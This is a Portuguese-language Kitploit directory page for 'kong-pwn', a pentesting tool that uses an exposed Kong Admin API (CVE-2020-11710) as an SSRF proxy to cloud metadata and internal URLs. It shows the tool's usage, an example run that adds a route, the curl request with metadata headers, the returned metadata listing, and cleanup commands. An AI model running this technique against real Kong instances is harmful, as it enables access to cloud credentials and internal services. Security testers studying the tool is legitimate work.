Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
kong-pwn — Use a KongAPI exposta para atuar como um proxy e obter urls de metadados ou urls internas | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/kong-pwn
ReconhecimentoExploraçãoColeta de InformaçõesSegurança WebTestes de PenetraçãoSegurança na NuvemConfiguração IncorretaRed TeamingSegurança de API
GitHubrandomrobbiebf/kong-pwn

kong-pwn

Use a KongAPI exposta para atuar como um proxy e obter urls de metadados ou urls internas

62há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

kong-pwn

Use a KongAPI exposta para agir como um proxy e obter URLs de metadados ou URLs internas.

CVE-2020-11710 - Não é uma vulnerabilidade, é uma configuração incorreta.

Como usar

root@kitploit:~
usage: kong-pwn.py [-h] -u URL -s SSRF [-p PROXY]
kong-pwn.py: error: the following arguments are required: -u/--url, -s/--ssrf

Exemplo

root@kitploit:~
$ python3 kong-pwn.py -u http://127.0.0.1:8001
[+] Service Added [+]
[+] Route Added [+]

[+] Testing Kong for Metadata Proxy
curl http://127.0.0.1/foo/ -H "Host: metadata.local" -H "Metadata: true" -H "Metadata-Flavor: Google"

1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
2018-03-28
2018-08-17
2018-09-24
2019-10-01
latest

[+] To remove added routes and services do the following
curl -iX DELETE http://127.0.0.1:8001/routes/metadata-endpoint
curl -iX DELETE http://127.0.0.1:8001/services/metadata-endpoint
Baixar ferramenta